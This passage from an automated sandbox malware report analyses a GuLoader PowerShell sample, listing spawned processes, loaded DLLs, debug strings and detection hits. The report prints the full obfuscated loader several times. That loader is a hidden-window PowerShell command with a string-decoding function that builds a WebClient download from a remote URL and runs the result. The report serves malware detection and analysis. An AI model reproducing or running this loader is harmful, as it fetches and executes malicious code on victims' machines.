MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"Jump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2120457233.00000289A2A3C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2120457233.00000289A2A3C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: Qib.pdb[ source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD96000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: m.Core.pdbL source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: *on.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Yara detected GuLoader
        Source: Yara matchFile source: 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Zannes)$global:Pussley = [System.Text.Encoding]::ASCII.GetString($Professionel)$global:Papirarkiv61=$Pussley.substring($Sanitetsvsenernes,$Rehaul)
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryer
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F37687 push esp; retf 2_2_00007FF848F37688
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F3707B pushad ; retf 2_2_00007FF848F37089
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F300BD pushad ; iretd 2_2_00007FF848F300C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8490071C5 push edi; retf 2_2_00007FF8490071C6
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
